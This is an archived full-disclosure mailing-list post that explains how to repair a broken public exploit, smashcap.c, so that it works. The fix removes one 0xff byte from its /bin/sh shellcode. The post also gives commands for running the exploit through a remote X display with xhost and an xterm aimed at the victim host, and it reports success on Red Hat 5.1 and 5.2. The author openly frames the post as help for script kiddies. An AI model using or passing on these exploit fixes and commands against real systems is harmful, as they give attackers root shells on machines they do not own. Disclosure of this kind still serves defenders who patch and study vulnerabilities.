Hi,

since Bugtraq is a full-disclosure list, let's help the script kiddies a bit and scare the sysadmins a little bit more...

To make the smashcap.c work, all you have to do is remove one 0xff character before /bin/sh in the shellcode, so the line would be:

"\x80\xe8\xdc\xff\xff\xff/bin/sh"

instead of:

"\x80\xe8\xdc\xff\xff\xff\xff/bin/sh"

Also, you'll have to be on console running X to exploit it, but if you have another box where you can start X then it's ok:

myhost$ startx; xhost +victim.com
victim$ ./smashcap

and modify the last line from the smashcap.c into:

execl("/usr/X11R6/bin/xterm","xterm", "-display", "victim.com:0", 0);

Well, it works on most Red Hats (tested on 5.1 and 5.2); on Slackware it sigsegv's, you need to work a little bit, sorry I don't have a Slackware box to work on.

regards,
lucysoft
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:58:01 PDT